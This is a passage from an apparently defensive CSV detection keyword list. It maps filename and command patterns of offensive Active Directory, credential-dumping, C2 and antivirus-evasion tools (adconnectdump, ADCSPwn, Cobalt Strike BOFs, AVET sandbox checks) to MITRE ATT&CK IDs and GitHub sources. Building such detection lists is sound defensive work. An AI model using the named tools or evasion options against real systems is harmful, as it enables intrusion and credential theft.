-*aclpwn.py*,offensive_tool_keyword,Aclpwn,Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn,T1098 - T1208 - T1550 - T1484 - T1486,TA0005 - TA0007,N/A,N/A,Exploitation tools,https://github.com/fox-it/aclpwn.py,1,0,N/A,N/A,7,647,104,2021-11-18T03:47:24Z,2018-12-04T18:45:04Z
-*ACLScanner.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*acltoolkit *,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z
-*acltoolkit.git*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z
-*acltoolkit-ad*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z
-*acltoolkit-main*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z
-*acronis_trueimage_xpc_privesc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*AcroRd32.exe FUZZ*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z
-*Action: Locating SCCM Management Servers*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z
-*Action: Locating SCCM Servers in Registry*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z
-*action=SchTaskCOMHijack *,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-*activedirectory/pwns.go*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z
-*activeScan++.py*,offensive_tool_keyword,ActiveScanPlusPlus,ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/albinowax/ActiveScanPlusPlus,1,1,N/A,7,6,568,192,2022-11-15T13:47:31Z,2014-06-23T10:04:13Z
-*AD Privesc Automation*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z
-*ad_dns_dump.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z
-*AD_Enumeration_Hunt.ps1*,offensive_tool_keyword,AD_Enumeration_Hunt,This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment,T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083,TA0001 - TA0007 - TA0005 - TA0002 - TA0003,N/A,N/A,AD Enumeration,https://github.com/alperenugurlu/AD_Enumeration_Hunt,1,1,N/A,7,1,79,16,2023-08-05T06:10:26Z,2023-08-05T05:16:57Z
-*AD_Enumeration_Hunt-alperen_ugurlu_hack*,offensive_tool_keyword,AD_Enumeration_Hunt,This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment,T1018 - T1003 - T1033 - T1087 - T1069 - 
T1046 - T1069.002 - T1047 - T1083,TA0001 - TA0007 - TA0005 - TA0002 - TA0003,N/A,N/A,AD Enumeration,https://github.com/alperenugurlu/AD_Enumeration_Hunt,1,1,N/A,7,1,79,16,2023-08-05T06:10:26Z,2023-08-05T05:16:57Z
-*ADACLScan.ps1*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,1,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z
-*ADACLScanner*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z
-*ADACLScanner-master*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,1,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z
-*adalanche analyze*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z
-*adalanche collect*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z
-*adalanche-*.exe*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain 
Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z
-*Adalanche.git*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z
-*adalanche-collector*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z
-*ADCollector.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z
-*adconnectdump.py*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z
-*adconnectdump-master*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential 
Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z
-*adcs_enum.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z
-*adcs_enum_com.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z
-*adcs_enum_com2.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z
-*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*adcsattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*adcskiller.py*,offensive_tool_keyword,ADCSKiller,ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure,T1552.004 - T1003.003 - T1114.002,TA0006 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/grimlockx/ADCSKiller,1,1,N/A,N/A,6,535,53,2023-05-19T17:36:37Z,2023-05-19T06:51:41Z -*ADCSPwn.csproj*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*ADCSPwn.exe*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*ADCSPwn.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ADCSPwn.sln*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*ADCSPwn-master*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*add_evasion check_fast_forwarding*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion computation_fibonacci *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion computation_timed_fibonacci*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion evasion_by_sleep *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion fopen_sandbox_evasion*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_bios_info*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_computer_domain *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_cpu_cores *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_install_date *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_num_processes*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_standard_browser *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_tickcount*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion gethostbyname_sandbox_evasion*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_background_wp*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_folder *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_network_drive*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_public_desktop*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_recent_files*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_recycle_bin*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_username *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_vm_mac*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_vm_regkey*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense 